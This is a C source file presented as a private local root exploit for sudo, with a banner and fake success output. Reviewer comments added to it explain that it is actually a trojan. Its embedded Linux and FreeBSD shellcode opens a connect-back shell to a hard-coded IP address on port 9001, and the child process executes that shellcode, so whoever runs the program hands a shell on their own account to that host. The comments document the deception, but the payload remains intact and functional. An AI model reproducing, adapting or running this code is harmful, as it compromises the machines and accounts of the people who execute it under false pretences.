kw3rln

Priv8 Version of local exploit SUDO

/**************************************************************
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE

* sudo 1.6.8p9 - p12+++ local root
* by HST - Hezuah Security Team Iran
*
* PRIVATE --- DO NOT DISTRIBUTE
*
* Use sudo's insecure temp file to feed a
* buffer overflow. Exploitation:
* izik's method of using JMP %ESP for
* linux-gate.so.1. Searches for JMP %ESP, very
* reliable. The exploit also works for *BSD,
* but you have to modify -g to make it work.
* Values of 0xbf0caa2b for FreeBSD 6 work.
*
* $ ./spwn -f /tmp/fakefile
* [+] Starting up...
* [+] Finding offset
* [+] Found JMP %ESP @ 0xffffe75f
* [+] Calculating header
* [+] Child calculations
* [+] Writing malicious tmp file
* [+] Getting child offset
* [+] Final value for offset: 0xffffe75f
* # whoami
* root
* #
*
* or ./spwn -f /tmp/fakefile -g 0xbf0caa2b
*
*
* linux-gate: http://www.milw0rm.com/papers/55
*
* ~censored~ whitehats - hack the planet: #hezuah

PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
**************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/utsname.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/time.h>
#include <time.h>

/*
 * NOTE(review): neither byte string below has anything to do with sudo.  Read
 * as x86 machine code, lincode is a connect-back shell: socketcall/socket(2,1,0),
 * a dup2() loop that puts the socket on fds 2, 1 and 0, connect() to the
 * address pushed as "\x42\x0b\x75\xb6" (66.11.117.182) on the port pushed as
 * "\x23\x29" (9001), then execve("/bin//sh").  bsdcode does the same with
 * FreeBSD syscall numbers (0x61 socket, 0x62 connect, 0x5a dup2, 0x3b execve)
 * and the same address/port.  sudo_own() below calls this array as a
 * function, so running the program hands an interactive shell on the invoking
 * account to that remote host.
 */
unsigned char lincode[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x42\x0b\x75\xb6\x66\x68"
"\x23\x29\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

/* FreeBSD flavour of the same connect-back payload; see the note above. */
unsigned char bsdcode[] =
"\x6a\x61\x58\x99\x52\x42\x52\x42\x52\x68\x42\x0b\x75\xb6\xcd\x80"
"\x68\x10\x02\x23\x29\x89\xe1\x6a\x10\x51\x50\x51\x97\x6a\x62\x58"
"\xcd\x80\x6a\x02\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53"
"\xb0\x3b\xcd\x80";

/* Values main() stores in OS after uname(); only a "BSD" substring of sysname is tested. */
#define OS_LINUX 0
#define OS_BSD 1
/* Only used as CMD+offset inside sudo_own(), i.e. as pointer arithmetic on this literal. */
#define CMD "/bin/sh"

int OS;                  /* OS_LINUX or OS_BSD, set once in main() */
char **k;                /* assigned argv in main(); never read in this file */
unsigned long BSDoffset; /* declared but never referenced in this file */

//sighandler_t sighandle(int a)
//{
// return;
//}

/*
 * Scan 4095 bytes starting at `offset` for the two-byte sequence FF E4
 * (x86 "jmp *%esp") and return the address of the first match.
 *
 * offset: address to start scanning at; it is dereferenced directly, so an
 *         unmapped address terminates the process.
 * Returns the match address, or `offset` itself if nothing is found.
 *
 * NOTE(review): this function is never called anywhere in this file; the
 * "[+] Finding offset" message in sudo_own() is printed without any scan.
 * The printf below passes a pointer to a %x conversion (format/argument
 * mismatch; %p would be the matching conversion).
 */
unsigned long find_esp(unsigned long offset) {
int i;
char *ptr = (char *) offset;

/* i+1 reaches index 4095 on the last iteration, i.e. exactly one 4096-byte page. */
for (i = 0; i < 4095; i++) {
if (ptr[i] == '\xff' && ptr[i+1] == '\xe4') {
printf("[+] Found JMP %%ESP @ 0x%08x\n", ptr+i);
return (unsigned long) ptr+i;
}
}

printf("[-] Didn't find JMP %%ESP, but trying anyway...\n");
return ((unsigned long)ptr);
/* sometimes this actually works, why? */
}

/*
 * Reverse the byte order of every 4-byte word in p[0..size]: bytes 0<->3 and
 * 1<->2 of each word are exchanged with XOR swaps, in place.
 *
 * p:    buffer to rewrite
 * size: byte count supplied by the caller (sudo_own() passes 16)
 *
 * NOTE(review): the loop condition is `p <= q` with q == p + size, so the
 * final iteration touches p[size..size+3] -- one word past the requested
 * range.  With the only caller (revert(own, 16), own being at least 94 bytes)
 * this stays inside the allocation, but the function itself is off by one
 * word.  `ptr` and `i` are unused.
 */
void revert(char *p,unsigned int size)
{
char *ptr = p;
int i = 0;
char *q = p + size; //end

for(; p <= q; p +=4)
{
/* swap p[0] and p[3] */
*p ^= *(p+3);
*(p+3) ^= *p;
*p ^= *(p+3);

/* swap p[1] and p[2] */
*(p+1) ^= *(p+2);
*(p+2) ^= *(p+1);
*(p+1) ^= *(p+2);
}
}

/*
 * Store the low 32 bits of `word` into o[0..3], least-significant byte first
 * (little-endian), one byte per 8-bit shift.
 *
 * o:    destination, at least 4 bytes
 * word: value to serialise; bits above 31 are discarded
 */
void set_bytes(char *o, long word)
{
int idx;
for (idx = 0; idx < 4; idx++) {
o[idx] = (word >> (8 * idx)) & 0xff;
}
}

/*
 * Build the 30-byte "header" that a child process writes to a temp file, have
 * that child execute the shellcode array in-process, and return the header
 * buffer to main().
 *
 * file:   path given with -f; copied unbounded into the header (see below)
 * offset: value from -g, or the default 0xffffe000
 * mode:   -t flag; accepted but never read
 * ovr:    -o flag; added to getuid() when forming the temp file name
 * Returns `own`, a heap buffer that main() passes straight to execl().
 *
 * NOTE(review): nothing in this function touches a sudo bug.  The line
 * `offset = get_bytes();` in the child calls lincode/bsdcode as a function,
 * i.e. it runs the connect-back shell payload on the invoking user's account
 * (it never returns, because the payload ends in execve).  On a build where
 * the data segment is non-executable that call faults instead.  The temp-file
 * and sudo decoration around it is never reached in a meaningful way.
 */
char *sudo_own(char *file, unsigned long offset,int mode,int ovr)
{
char *own = NULL;
char *file_ = calloc(strlen(file) + 20,sizeof(char)); /* never freed; result unchecked */
int (*get_bytes)(); /* will be aimed at the global shellcode array */
int cnt = 0;
int fp; /* a file descriptor, despite the name */
struct timeval tv;

/* Precedence: `&` binds looser than `!=`, so this reads as
 * (offset & (0xffff != 0xe000)) || (offset & (0xffff0000 != 0xffff0000)),
 * which is just `offset & 1`.  037777760000 (octal) == 0xffffe000. */
if(offset & 0xffff != 0xe000 || offset & 0xffff0000 != 0xffff0000)
offset = 037777760000;
printf("[+] Starting up...\n");

/* own = 25 bytes of header space plus a copy of the payload (sizeof(lincode)
 * is 71 with the string NUL, sizeof(bsdcode) 69).  malloc is unchecked, and
 * get_bytes points at the global array itself, not at the copy. */
if(OS == OS_LINUX)
{
own = malloc(sizeof(lincode) + 25);
memcpy(own+24,lincode,sizeof(lincode)); get_bytes = (int(*)())lincode;
}
else
{
own = malloc(sizeof(bsdcode) + 25);
memcpy(own+24,bsdcode,sizeof(bsdcode)); get_bytes = (int(*)())bsdcode;
}

/* No search happens here (find_esp() is never called); the message is
 * cosmetic.  set_bytes() rewrites the same four bytes memcpy just filled. */
printf("[+] Finding offset\n");
memcpy(own+4,&offset,sizeof(unsigned long));
set_bytes(own + 4,offset);

/* `&` binds tighter than `^`, so the addend is (offset ^ cnt) truncated to a
 * char.  cnt is 16 after the loop and is reused as revert()'s size. */
printf("[+] Calculating header\n");
for(cnt = 0; cnt < 16; cnt++)
own[cnt] += (offset ^ 0xff & cnt);
revert(own,cnt);

/* Unbounded copy: roughly 80 bytes remain in own from index 16, so a longer
 * -f path overflows the heap block. */
strcpy(own + 16,file);

/* fork() == -1 is truthy, so a failed fork is treated as the parent. */
if(!fork())
{
cnt = 0;
//signal(1,sighandle); signal(2,sighandle);
printf("[+] Child calculations\n");
/* Predictable name: <file>.<uid+ovr>.<tv_sec rounded down to 512 s>.
 * tv_sec is a time_t, not necessarily an int, so %d may not match it. */
gettimeofday(&tv,NULL);
tv.tv_sec &= 0xfffffe00;
snprintf(file_,strlen(file) + 20,"%s.%d.%d",file,getuid() + ovr,tv.tv_sec);
/* O_CREAT without the mode argument: the new file's permission bits are
 * whatever happens to sit in the missing third-argument slot.  The access
 * mode is O_RDONLY (0 on Linux/BSD), so the write() below fails. */
if((fp = open(file_,O_CREAT | O_EXCL)) == -1)
_exit(-1);

printf("[+] Writing malicious tmp file\n");
write(fp,own,30); /* return value ignored */

printf("[+] Getting child offset\n");
close(fp);
/* Executes the shellcode array as code -- this is the connect-back shell. */
offset = get_bytes();

/* Not reached once the payload has execve'd.  As written it is also
 * malformed: argv[0] becomes "-z", the list has no terminating (char *)NULL,
 * and CMD+offset is pointer arithmetic on the literal "/bin/sh". */
execl("/usr/sbin/sudo","-z","--tmpfile",file,CMD+offset);
}

/* Parent: cnt is 16 here, so the divisor is 51; for the default offset
 * 0xffffe000 % 51 is non-zero, so this path prints the "Improper value" line
 * and exits 0 while the child keeps running. */
sleep(1);
printf("[+] Final value for offset: 0x%08x\n",offset);
if(offset % (++cnt * 3))
printf("[-] Improper value for offset, try -g, -t, or -o\n"),exit(0);

return own;
}

/*
 * Entry point.  Parses -h/-v/-f/-g/-t/-o, picks OS from uname(), then calls
 * sudo_own() (which forks and runs the shellcode payload in the child) and
 * finally tries to exec /usr/sbin/sudo.
 *
 * NOTE(review): the execl() argument list has no terminating (char *)NULL,
 * which execl requires, so the call itself is ill-formed; by the time it
 * runs, sudo_own()'s child has already executed the connect-back shellcode.
 */
int main(int argc, char **argv)
{
int c = 0;
char *file = NULL;
unsigned long offset = 0xffffe000; /* same value sudo_own() falls back to */
struct utsname u;

int t_mode = 0, try_overwrite = 0;
k = argv; /* global k is never read */

while((c = getopt(argc,argv,"hvf:g:to")) != -1)
{
switch(c)
{
case 'h':
case 'v':
printf("~censored~ read the source code\n");
exit(0);
case 'f':
file = optarg;
break;
case 'g':
/* Skips two characters unconditionally (assumes a "0x" prefix); a value
 * given without the prefix loses its first two digits, and the NULL
 * endptr means malformed input is not detected. */
offset = strtoul(optarg+2,NULL,16);
break;
case 't':
t_mode = 1; /* passed as `mode`, which sudo_own() never reads */
break;
case 'o':
try_overwrite = 1;
break;
default:
goto START;
}
}
START:
if(file == NULL)
fprintf(stderr,"specify a file with -f\n"),exit(-1);

uname(&u); /* return value unchecked */
/* Any sysname containing "BSD" selects the FreeBSD payload. */
if(strstr(u.sysname,"BSD") != NULL)
OS = OS_BSD;
else
OS = OS_LINUX;

/* sudo_own() runs first (argument evaluation) and is where the fork and the
 * shellcode call happen.  argv[0] of the exec'd program would be "-b", -z is
 * not a sudo option as far as I know, and the list lacks its NULL terminator. */
execl("/usr/sbin/sudo","-b","-z",
sudo_own(file,offset,t_mode,try_overwrite));
perror("execl");

return 0;
}
